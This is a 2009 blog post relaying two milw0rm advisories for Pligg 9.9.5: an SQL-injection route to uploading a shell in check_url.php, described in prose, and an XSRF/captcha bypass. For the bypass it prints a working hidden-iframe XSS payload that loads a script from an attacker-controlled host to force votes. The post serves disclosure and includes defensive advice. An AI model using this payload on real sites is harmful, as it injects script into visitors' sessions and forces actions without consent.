2 New Pligg v9.9.5 Security Exploits Found

pligg_10Two new security exploits have bee found in the most used version of Pligg v9.9.5, the first exploit reported in January is a Pligg 9.9.5 Beta Perl exploit in the EVB check_url.php file. The second exploit discovered on the 29th January is a captcha bypass exploit, more details below.

With not posting as much during January we missed these two Exploit reports from milw0rm related to v9.9.5 of the pligg system which is likely to be the version that most people will be using.

22/12/2008 Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit

AUTHOR
discovered & written by Ams ax330d [doggy] gmail [dot] com

VULN. DESCRIPTION:
Vulnerability hides in ‘evb/check_url.php’ unfiltered $_GET['url'] parameter.
Actually, it has filtration.
Filtration strips tags and converts html special chars , but it is not enough, because we can use MySQLs CHAR() function to convert shell to allowed chars.

EXPLOIT WORK:
Firtsly, exploit tryes to get full server path, but if not succeeded, then it will brute it. If path has been found then exploit will try to upload tiny shell via SQl-Injection.

REQUIREMENTS:
MySQL should be able to write to file.
Know full server path to portal.
magiq_quotes_gpc=off

milw0rm: Pligg 9.9.5 Beta Perl exploit

29/01/2009 XSRF Protection Bypass and Captcha Bypass

This vulnerability targets CAPTCHA within pligg

XSRF Protection Bypass

XSRF Protection Bypass
<html>
<!--
Remove this iframe from this file and place it on a site that you want
to force people to vote for.
Change these pligg_story_to_vote_for, target_pligg_site and site_you_control .
-->
<iframe src='http://target_pligg_site/index.php?category="><script src=http://site_you_control/pligg_auto_voter.html
type=text/javascript></script>' width="0%" height="0%"></iframe>
</html>

If you’re still using the ‘default‘ captcha method you should switch to WhiteHat or reCaptcha, and remove the /ts_image.php file (if you have it). If you don’t have the /ts_image.php file, then you’re ok.

milw0rm: XSRF Protection Bypass and Captcha Bypass

If you enjoyed this post, make sure you subscribe to our RSS feed!

Article Details

digg this
Gravatar

Author: Lincoln on February 17th, 2009

Category: Pligg

Tags: , ,

Leave a Reply